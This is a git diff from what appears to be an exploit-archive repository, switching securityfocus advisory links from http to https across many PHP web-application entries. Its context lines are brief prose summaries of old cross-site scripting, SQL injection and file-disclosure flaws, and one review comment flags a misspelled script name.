@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9689/info +source: https://www.securityfocus.com/bid/9689/info Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter. diff --git a/exploits/php/webapps/23725.txt b/exploits/php/webapps/23725.txt index d045caf03..c366ab6b8 100644 --- a/exploits/php/webapps/23725.txt +++ b/exploits/php/webapps/23725.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9689/info +source: https://www.securityfocus.com/bid/9689/info Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter. diff --git a/exploits/php/webapps/23726.txt b/exploits/php/webapps/23726.txt index 2a8df68e1..6e244676f 100644 --- a/exploits/php/webapps/23726.txt +++ b/exploits/php/webapps/23726.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9689/info +source: https://www.securityfocus.com/bid/9689/info Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter. diff --git a/exploits/php/webapps/23727.txt b/exploits/php/webapps/23727.txt index 76302b8d9..57e2508ae 100644 --- a/exploits/php/webapps/23727.txt +++ b/exploits/php/webapps/23727.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9689/info +source: https://www.securityfocus.com/bid/9689/info Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter. diff --git a/exploits/php/webapps/23742.txt b/exploits/php/webapps/23742.txt index 4a4082d88..d0e314fc4 100644 --- a/exploits/php/webapps/23742.txt +++ b/exploits/php/webapps/23742.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9720/info +source: https://www.securityfocus.com/bid/9720/info phpNewsManager is prone to a file disclosure vulnerability. Remote attackers may submit malicious requests to the software that contain directory traversal sequences, potentially exposing sensitive resources outside of the hosting web server root. diff --git a/exploits/php/webapps/23744.txt b/exploits/php/webapps/23744.txt index 6cf99cc0a..8256e69de 100644 --- a/exploits/php/webapps/23744.txt +++ b/exploits/php/webapps/23744.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9725/info +source: https://www.securityfocus.com/bid/9725/info ezboard is prone to an HTML injection vulnerability. An attacker may exploit this issue by including hostile HTML and script code encapsulated in [font] tags of posts to the bulletin board. This code may be rendered in the web browser of a user who views these areas of the site. This would occur in the security context of the site hosting ezboard. diff --git a/exploits/php/webapps/23745.txt b/exploits/php/webapps/23745.txt index bfbbd8f93..e061344e9 100644 --- a/exploits/php/webapps/23745.txt +++ b/exploits/php/webapps/23745.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9726/info +source: https://www.securityfocus.com/bid/9726/info XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote user supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user or to have malicious SQL queries executed in the underlying database. diff --git a/exploits/php/webapps/23746.txt b/exploits/php/webapps/23746.txt index 591b1961b..d57d909ff 100644 --- a/exploits/php/webapps/23746.txt +++ b/exploits/php/webapps/23746.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9726/info +source: https://www.securityfocus.com/bid/9726/info XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote user supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user or to have malicious SQL queries executed in the underlying database. diff --git a/exploits/php/webapps/23747.txt b/exploits/php/webapps/23747.txt index 7a6785d73..7a95773bd 100644 --- a/exploits/php/webapps/23747.txt +++ b/exploits/php/webapps/23747.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9726/info +source: https://www.securityfocus.com/bid/9726/info XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote user supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user or to have malicious SQL queries executed in the underlying database. diff --git a/exploits/php/webapps/23748.txt b/exploits/php/webapps/23748.txt index 66bdd4cc5..580d6121c 100644 --- a/exploits/php/webapps/23748.txt +++ b/exploits/php/webapps/23748.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9726/info +source: https://www.securityfocus.com/bid/9726/info XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote user supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user or to have malicious SQL queries executed in the underlying database. 
diff --git a/exploits/php/webapps/23749.txt b/exploits/php/webapps/23749.txt index 623b2d12f..1cd361602 100644 --- a/exploits/php/webapps/23749.txt +++ b/exploits/php/webapps/23749.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9727/info +source: https://www.securityfocus.com/bid/9727/info LiveJournal is reportedly prone to HTML injection via Cascading Style Sheet (CSS) tags. It is possible to inject hostile HTML and script code into journal entries through this vulnerability. diff --git a/exploits/php/webapps/23753.txt b/exploits/php/webapps/23753.txt index 5cfb0f79a..5bad7a19b 100644 --- a/exploits/php/webapps/23753.txt +++ b/exploits/php/webapps/23753.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9737/info +source: https://www.securityfocus.com/bid/9737/info It has been reported that BadBlue Server may be prone to a remote path disclosure vulnerability that may allow an attacker to disclose the installation path by issuing a request for 'phptest.php' script. diff --git a/exploits/php/webapps/23767.txt b/exploits/php/webapps/23767.txt index c4add0d76..886acdcc7 100644 --- a/exploits/php/webapps/23767.txt +++ b/exploits/php/webapps/23767.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9768/info +source: https://www.securityfocus.com/bid/9768/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/23770.txt b/exploits/php/webapps/23770.txt index 793b0e686..0a6500d9e 100644 --- a/exploits/php/webapps/23770.txt +++ b/exploits/php/webapps/23770.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9771/info +source: https://www.securityfocus.com/bid/9771/info It has been reported that iGeneric Free Shopping Cart is prone to an SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user supplied URI parameters 
diff --git a/exploits/php/webapps/23773.txt b/exploits/php/webapps/23773.txt index ada25f479..2dcc1a117 100644 --- a/exploits/php/webapps/23773.txt +++ b/exploits/php/webapps/23773.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9773/info +source: https://www.securityfocus.com/bid/9773/info It has been reported that iGeneric Free Shopping Cart is prone to a cross-site vulnerability. This issue is due to a failure of the application to properly sanitize user supplied URI parameters diff --git a/exploits/php/webapps/23774.txt b/exploits/php/webapps/23774.txt index d3abe6287..9ec0f2306 100644 --- a/exploits/php/webapps/23774.txt +++ b/exploits/php/webapps/23774.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9774/info +source: https://www.securityfocus.com/bid/9774/info It has been reported that YaBB SE may be prone to multiple vulnerabilities due to improper input validation. The issues may allow an attacker to carry out SQL injection and directory traversal attacks. Successful exploitation of these issues may allow an attacker to gain access to sensitive information that may be used to mount further attacks against a vulnerable system. The SQL injection vulnerabilities can be exploited to gain access to user authentication credentials and corrupt user information in the underlying database. diff --git a/exploits/php/webapps/23775.txt b/exploits/php/webapps/23775.txt index 025ce6e8c..6ea84e122 100644 --- a/exploits/php/webapps/23775.txt +++ b/exploits/php/webapps/23775.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9774/info +source: https://www.securityfocus.com/bid/9774/info It has been reported that YaBB SE may be prone to multiple vulnerabilities due to improper input validation. The issues may allow an attacker to carry out SQL injection and directory traversal attacks. Successful exploitation of these issues may allow an attacker to gain access to sensitive information that may be used to mount further attacks against a vulnerable system. The SQL injection vulnerabilities can be exploited to gain access to user authentication credentials and corrupt user information in the underlying database. diff --git a/exploits/php/webapps/23792.txt b/exploits/php/webapps/23792.txt index 2972a468e..9759befc7 100644 --- a/exploits/php/webapps/23792.txt +++ b/exploits/php/webapps/23792.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9812/info +source: https://www.securityfocus.com/bid/9812/info It has been reported that the VirtuaNews non-default modules 'Files' and 'Vulns' are prone to multiple cross-site scripting vulnerabilities. These problems surround the application's failure to properly validate user supplied URI input. When exploited an attacker can execute arbitrary script and HTML code in the context of the vulnerable application. diff --git a/exploits/php/webapps/23795.txt b/exploits/php/webapps/23795.txt index 226f72984..a418039d3 100644 --- a/exploits/php/webapps/23795.txt +++ b/exploits/php/webapps/23795.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9822/info +source: https://www.securityfocus.com/bid/9822/info It has been reported that Invision Power Board may be prone to a cross-site scripting vulnerability. This may allow a remote attacker to cause hostile HTML or script code to be rendered in a user's browser via a malicious link to a vulnerable site.. The issue presents itself due to insufficient sanitization of user-supplied data via the 'pop' URI parameter, which will be included in dynamically generated web pages. diff --git a/exploits/php/webapps/23797.txt b/exploits/php/webapps/23797.txt index 165018083..fc4a0fb1a 100644 --- a/exploits/php/webapps/23797.txt +++ b/exploits/php/webapps/23797.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9830/info +source: https://www.securityfocus.com/bid/9830/info It has been reported that an input validation error with the potential for use in a SQL injection attack is present in the "db_mysql_loeschen2.php" script. When a user is requesting the "db_mysql_loeschen2.php" script, one of the parameters that can be passed to the script is "db". There are no checks on the value of this variable before it is used in an SQL query string. diff --git a/exploits/php/webapps/23798.txt b/exploits/php/webapps/23798.txt index 5700b6aca..8f36b567b 100644 --- a/exploits/php/webapps/23798.txt +++ b/exploits/php/webapps/23798.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9831/info +source: https://www.securityfocus.com/bid/9831/info The Confixx PERL debugging utility functionality has been reported to be prone to a remote command execution vulnerability. The issue is reported to occur when a command sequence is appended to a HTTP request for a PERL script resource, the command sequence must contain a prefixed ';' semi-colon character. When this request is processed, the command sequence will be reportedly executed with the privileges of the process that invokes the Confixx PERL debugging utility. 
diff --git a/exploits/php/webapps/23812.txt b/exploits/php/webapps/23812.txt index f7f5fc69b..d3a1fe3cf 100644 --- a/exploits/php/webapps/23812.txt +++ b/exploits/php/webapps/23812.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9873/info +source: https://www.securityfocus.com/bid/9873/info It has been reported that YaBB and YaBB SE are prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure of the applications to properly validate URI supplied user input. diff --git a/exploits/php/webapps/23814.txt b/exploits/php/webapps/23814.txt index fff326f95..48ed9c9ec 100644 --- a/exploits/php/webapps/23814.txt +++ b/exploits/php/webapps/23814.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9879/info +source: https://www.securityfocus.com/bid/9879/info It has been reported that PHP-Nuke may be prone to multiple cross-site scripting vulnerabilities. These vulnerabilities occur due to insufficient sanitization of user-supplied data via the 'Your Name', 'nicname', 'fname', 'ratenum', and 'search' fields of 'modules.php' script. Exploitation could allow for theft of cookie-based authentication credentials. Other attacks are also possible. diff --git a/exploits/php/webapps/23815.txt b/exploits/php/webapps/23815.txt index a1598eb9c..0c933bc9b 100644 --- a/exploits/php/webapps/23815.txt +++ b/exploits/php/webapps/23815.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9881/info +source: https://www.securityfocus.com/bid/9881/info It has been reported that 4nAlbum is prone to multiple vulnerabilities. These issues are primarily due to a failure of the module to validate user input. diff --git a/exploits/php/webapps/23816.txt b/exploits/php/webapps/23816.txt index a8d084c10..3a3d718d4 100644 --- a/exploits/php/webapps/23816.txt +++ b/exploits/php/webapps/23816.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9881/info +source: https://www.securityfocus.com/bid/9881/info It has been reported that 4nAlbum is prone to multiple vulnerabilities. These issues are primarily due to a failure of the module to validate user input. diff --git a/exploits/php/webapps/23817.txt b/exploits/php/webapps/23817.txt index d74d53115..939bff551 100644 --- a/exploits/php/webapps/23817.txt +++ b/exploits/php/webapps/23817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9881/info +source: https://www.securityfocus.com/bid/9881/info It has been reported that 4nAlbum is prone to multiple vulnerabilities. These issues are primarily due to a failure of the module to validate user input. diff --git a/exploits/php/webapps/23818.txt b/exploits/php/webapps/23818.txt index 53fa8831f..f7af52ec3 100644 --- a/exploits/php/webapps/23818.txt +++ b/exploits/php/webapps/23818.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9882/info +source: https://www.securityfocus.com/bid/9882/info It has been reported that Phorum is prone to a cross-site scripting vulnerability across multiple modules. The issue presents itself across multiple modules including 'login.php', 'register.php', and 'profile.php'. These modules employ two hidden variables named 'f' and 'target', which are passed user-supplied input values from HTTP_REFERER without proper sanitization. diff --git a/exploits/php/webapps/23819.txt b/exploits/php/webapps/23819.txt index 714ec67cb..0720f3357 100644 --- a/exploits/php/webapps/23819.txt +++ b/exploits/php/webapps/23819.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9882/info +source: https://www.securityfocus.com/bid/9882/info It has been reported that Phorum is prone to a cross-site scripting vulnerability across multiple modules. The issue presents itself across multiple modules including 'login.php', 'register.php', and 'profile.php'. These modules employ two hidden variables named 'f' and 'target', which are passed user-supplied input values from HTTP_REFERER without proper sanitization. diff --git a/exploits/php/webapps/23820.txt b/exploits/php/webapps/23820.txt index 6eb49c819..871417254 100644 --- a/exploits/php/webapps/23820.txt +++ b/exploits/php/webapps/23820.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9882/info +source: https://www.securityfocus.com/bid/9882/info It has been reported that Phorum is prone to a cross-site scripting vulnerability across multiple modules. The issue presents itself across multiple modules including 'login.php', 'register.php', and 'profile.php'. These modules employ two hidden variables named 'f' and 'target', which are passed user-supplied input values from HTTP_REFERER without proper sanitization. diff --git a/exploits/php/webapps/23821.php b/exploits/php/webapps/23821.php index d2550aff8..f027c60f5 100644 --- a/exploits/php/webapps/23821.php +++ b/exploits/php/webapps/23821.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9883/info +source: https://www.securityfocus.com/bid/9883/info A vulnerability has been reported to exist in the software that may allow a remote user to inject malicious SQL syntax into database queries. The problem reportedly exists in one of the parameters of the search.php script. This issue is caused by insufficient sanitization of user-supplied data. A remote attacker may exploit this issue to influence SQL query logic to disclose sensitive information that could be used to gain unauthorized access. 
diff --git a/exploits/php/webapps/23822.txt b/exploits/php/webapps/23822.txt index 4dae7a13e..de3941c69 100644 --- a/exploits/php/webapps/23822.txt +++ b/exploits/php/webapps/23822.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9888/info +source: https://www.securityfocus.com/bid/9888/info It has been reported that VBulletin is prone to a cross-site scripting vulnerability in the 'forumdisplay.php' script. This issue is reportedly due to a failure to sanitize user input and so allow for injection of HTML and script code that may facilitate cross-site scripting attacks. diff --git a/exploits/php/webapps/23823.txt b/exploits/php/webapps/23823.txt index 79f9366a4..086084f3d 100644 --- a/exploits/php/webapps/23823.txt +++ b/exploits/php/webapps/23823.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9889/info +source: https://www.securityfocus.com/bid/9889/info It has been reported that VBulletin is prone to a cross-site scripting vulnerability in the 'showthread.php' script. This issue is reportedly due to a failure to sanitize user input and so allow for injection of HTML and script code that may facilitate cross-site scripting attacks. diff --git a/exploits/php/webapps/23824.txt b/exploits/php/webapps/23824.txt index 1c93b7f84..4b6a2eaeb 100644 --- a/exploits/php/webapps/23824.txt +++ b/exploits/php/webapps/23824.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9890/info +source: https://www.securityfocus.com/bid/9890/info It has been reported that the Mambo 'index.php' script is prone to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly validate user supplied URI input. This issue could permit a remote attacker to create a malicious link to the vulnerable application that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user. 
diff --git a/exploits/php/webapps/23825.txt b/exploits/php/webapps/23825.txt index 319e6f742..5d5b0abda 100644 --- a/exploits/php/webapps/23825.txt +++ b/exploits/php/webapps/23825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9890/info +source: https://www.securityfocus.com/bid/9890/info It has been reported that the Mambo 'index.php' script is prone to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly validate user supplied URI input. This issue could permit a remote attacker to create a malicious link to the vulnerable application that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user. diff --git a/exploits/php/webapps/23834.txt b/exploits/php/webapps/23834.txt index eca2301d7..c7832f331 100644 --- a/exploits/php/webapps/23834.txt +++ b/exploits/php/webapps/23834.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9891/info +source: https://www.securityfocus.com/bid/9891/info It has been reported that the Mambo 'index.php' script is prone to an SQL injection vulnerability. This issue is due to a failure of the application to properly validate user supplied URI input. diff --git a/exploits/php/webapps/23835.txt b/exploits/php/webapps/23835.txt index 56f17a59f..c26050006 100644 --- a/exploits/php/webapps/23835.txt +++ b/exploits/php/webapps/23835.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9895/info +source: https://www.securityfocus.com/bid/9895/info It has been reported that PHP-Nuke is prone to a remote admin command execution vulnerability. This issue is due to a design error that allows an attacker to specify arbitrary URI values in bbCode tags contained within posts. diff --git a/exploits/php/webapps/23843.txt b/exploits/php/webapps/23843.txt index 2666f5e40..f8b23fae9 100644 --- a/exploits/php/webapps/23843.txt +++ b/exploits/php/webapps/23843.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9910/info +source: https://www.securityfocus.com/bid/9910/info It has been reported that vCard is prone to a remote authentication bypass vulnerability. This issue is due to a design error that would allow a malicious user access to certain admin functionality without having to first authenticate to the application. diff --git a/exploits/php/webapps/23844.txt b/exploits/php/webapps/23844.txt index 5ed604840..3bf57a829 100644 --- a/exploits/php/webapps/23844.txt +++ b/exploits/php/webapps/23844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9911/info +source: https://www.securityfocus.com/bid/9911/info It has been reported that Error Manager is prone to multiple vulnerabilities. These issues are due to failure to validate user input, failure to handle exceptional conditions and simple design errors. diff --git a/exploits/php/webapps/23845.txt b/exploits/php/webapps/23845.txt index 40412d1b7..aba9a55b7 100644 --- a/exploits/php/webapps/23845.txt +++ b/exploits/php/webapps/23845.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9911/info +source: https://www.securityfocus.com/bid/9911/info It has been reported that Error Manager is prone to multiple vulnerabilities. These issues are due to failure to validate user input, failure to handle exceptional conditions and simple design errors. diff --git a/exploits/php/webapps/23865.txt b/exploits/php/webapps/23865.txt index 64be176b3..6e887b764 100644 --- a/exploits/php/webapps/23865.txt +++ b/exploits/php/webapps/23865.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9940/info +source: https://www.securityfocus.com/bid/9940/info It has been reported that VBulletin is prone to a cross-site scripting vulnerability in the 'ptivate.php' script. This issue is reportedly due to a failure to sanitize user input and so allow for injection of HTML and script code that may facilitate cross-site scripting attacks. 
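Review bot: in the exploits/php/webapps/23865.txt hunk, the unchanged description line names the affected script as 'ptivate.php', which looks like a misspelling of the file name. The scheme change on line 1 is fine as it stands, but the script name should be checked against the referenced advisory (bid/9940) and corrected in a separate follow-up commit, so that this bulk URL edit stays mechanical and a search on the script name still finds this entry.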
diff --git a/exploits/php/webapps/23866.txt b/exploits/php/webapps/23866.txt index cdf33cd2d..e1ad634ab 100644 --- a/exploits/php/webapps/23866.txt +++ b/exploits/php/webapps/23866.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9942/info +source: https://www.securityfocus.com/bid/9942/info It has been reported that phpBB may be prone to multiple vulnerabilities that could allow an attacker to carry out SQL injection and cross-site scripting attacks. These vulnerabilities result from insufficient sanitization of user-supplied input via the 'id' parameter of 'admin_smilies.php' module and the 'style_id' parameter of 'admin_styles' module. diff --git a/exploits/php/webapps/23867.txt b/exploits/php/webapps/23867.txt index 8e6fc8c23..60f462c81 100644 --- a/exploits/php/webapps/23867.txt +++ b/exploits/php/webapps/23867.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9944/info +source: https://www.securityfocus.com/bid/9944/info It has been reported that Invision Gallery may be prone to multiple sql injection vulnerabilities, allowing an attacker to influence SQL query logic. The issues exist due to insufficient sanitization of user-supplied data via the 'img', 'cat', 'sort_key', 'order_key', 'user' and 'album' parameters of the gallery module accessed via the 'index.php' script. diff --git a/exploits/php/webapps/23868.txt b/exploits/php/webapps/23868.txt index c193204b2..f3551c4a2 100644 --- a/exploits/php/webapps/23868.txt +++ b/exploits/php/webapps/23868.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9945/info +source: https://www.securityfocus.com/bid/9945/info It has been reported that Top Site List may be prone to an SQL injection vulnerability that may allow remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks. The issue exists due to insufficient sanitizing of the 'id' URI parameter when using the 'comments' feature in 'index.php' script. 
diff --git a/exploits/php/webapps/23869.txt b/exploits/php/webapps/23869.txt index 644d1103d..503089e45 100644 --- a/exploits/php/webapps/23869.txt +++ b/exploits/php/webapps/23869.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9947/info +source: https://www.securityfocus.com/bid/9947/info It has been reported that MS-Analysis is prone to a multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied URI parameters. diff --git a/exploits/php/webapps/23870.txt b/exploits/php/webapps/23870.txt index 7a6640afd..61f9aaf95 100644 --- a/exploits/php/webapps/23870.txt +++ b/exploits/php/webapps/23870.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9948/info +source: https://www.securityfocus.com/bid/9948/info Reportedly the MS-Analysis module is prone to a remote SQL injection vulnerability. This issue is due to a failure to properly sanitize user supplied HTTP header input before using it in an SQL query. diff --git a/exploits/php/webapps/23885.txt b/exploits/php/webapps/23885.txt index a431a8438..6e217e641 100644 --- a/exploits/php/webapps/23885.txt +++ b/exploits/php/webapps/23885.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9994/info +source: https://www.securityfocus.com/bid/9994/info Multiple SQL injection, cross-site scripting and HTML injection vulnerabilities have been identified in the application, which may allow an attacker to execute arbitrary HTML or script code in a user's browser and/or influence SQL query logic to disclose sensitive information and carry out other attacks. diff --git a/exploits/php/webapps/23908.txt b/exploits/php/webapps/23908.txt index 331601040..17b79d893 100644 --- a/exploits/php/webapps/23908.txt +++ b/exploits/php/webapps/23908.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10044/info +source: https://www.securityfocus.com/bid/10044/info It has been reported that OpenBB is prone to a vulnerability that may allow malicious users to influence SQL queries of the affected application. This issue is due to a failure of the application to properly sanitize user-supplied URI data. diff --git a/exploits/php/webapps/23928.txt b/exploits/php/webapps/23928.txt index 96e57f22f..1f376208e 100644 --- a/exploits/php/webapps/23928.txt +++ b/exploits/php/webapps/23928.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10082/info +source: https://www.securityfocus.com/bid/10082/info NukeCalendar, which is a third-party calendar module for PHP-Nuke, is prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/23929.txt b/exploits/php/webapps/23929.txt index d26f10532..9b8291a25 100644 --- a/exploits/php/webapps/23929.txt +++ b/exploits/php/webapps/23929.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10082/info +source: https://www.securityfocus.com/bid/10082/info NukeCalendar, which is a third-party calendar module for PHP-Nuke, is prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/23930.txt b/exploits/php/webapps/23930.txt index 43fd6d39c..2fd70dfb4 100644 --- a/exploits/php/webapps/23930.txt +++ b/exploits/php/webapps/23930.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10082/info +source: https://www.securityfocus.com/bid/10082/info NukeCalendar, which is a third-party calendar module for PHP-Nuke, is prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/23931.txt b/exploits/php/webapps/23931.txt index 7403ad501..2d42cdc3c 100644 --- a/exploits/php/webapps/23931.txt +++ b/exploits/php/webapps/23931.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10082/info +source: https://www.securityfocus.com/bid/10082/info NukeCalendar, which is a third-party calendar module for PHP-Nuke, is prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/23932.txt b/exploits/php/webapps/23932.txt index 1bb9c39c1..50e54abb2 100644 --- a/exploits/php/webapps/23932.txt +++ b/exploits/php/webapps/23932.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10082/info +source: https://www.securityfocus.com/bid/10082/info NukeCalendar, which is a third-party calendar module for PHP-Nuke, is prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/23933.txt b/exploits/php/webapps/23933.txt index df925bbd0..d6c79ac46 100644 --- a/exploits/php/webapps/23933.txt +++ b/exploits/php/webapps/23933.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10082/info +source: https://www.securityfocus.com/bid/10082/info NukeCalendar, which is a third-party calendar module for PHP-Nuke, is prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/23934.txt b/exploits/php/webapps/23934.txt index 911071f7b..8d57375a6 100644 --- a/exploits/php/webapps/23934.txt +++ b/exploits/php/webapps/23934.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10084/info +source: https://www.securityfocus.com/bid/10084/info Multiple cross-site scripting vulnerabilities have been reported in AzDGDatingLite. These issues may be exploited by enticing a victim user to visit a malicious link that includes hostile HTML and script code. diff --git a/exploits/php/webapps/23935.txt b/exploits/php/webapps/23935.txt index 20012aa27..07474e62c 100644 --- a/exploits/php/webapps/23935.txt +++ b/exploits/php/webapps/23935.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10084/info +source: https://www.securityfocus.com/bid/10084/info Multiple cross-site scripting vulnerabilities have been reported in AzDGDatingLite. These issues may be exploited by enticing a victim user to visit a malicious link that includes hostile HTML and script code. diff --git a/exploits/php/webapps/23947.txt b/exploits/php/webapps/23947.txt index c2c1d2e6d..9e57df4b5 100644 --- a/exploits/php/webapps/23947.txt +++ b/exploits/php/webapps/23947.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23948.txt b/exploits/php/webapps/23948.txt index f327f7dc4..b2c039a18 100644 --- a/exploits/php/webapps/23948.txt +++ b/exploits/php/webapps/23948.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23949.txt b/exploits/php/webapps/23949.txt index 3f024c20e..33365fd41 100644 --- a/exploits/php/webapps/23949.txt +++ b/exploits/php/webapps/23949.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23950.txt b/exploits/php/webapps/23950.txt index 1ed679808..95b94b92a 100644 --- a/exploits/php/webapps/23950.txt +++ b/exploits/php/webapps/23950.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23951.txt b/exploits/php/webapps/23951.txt index 19d23bef6..1b19ac4a0 100644 --- a/exploits/php/webapps/23951.txt +++ b/exploits/php/webapps/23951.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23952.txt b/exploits/php/webapps/23952.txt index 24235d68a..9b5a03797 100644 --- a/exploits/php/webapps/23952.txt +++ b/exploits/php/webapps/23952.txt 
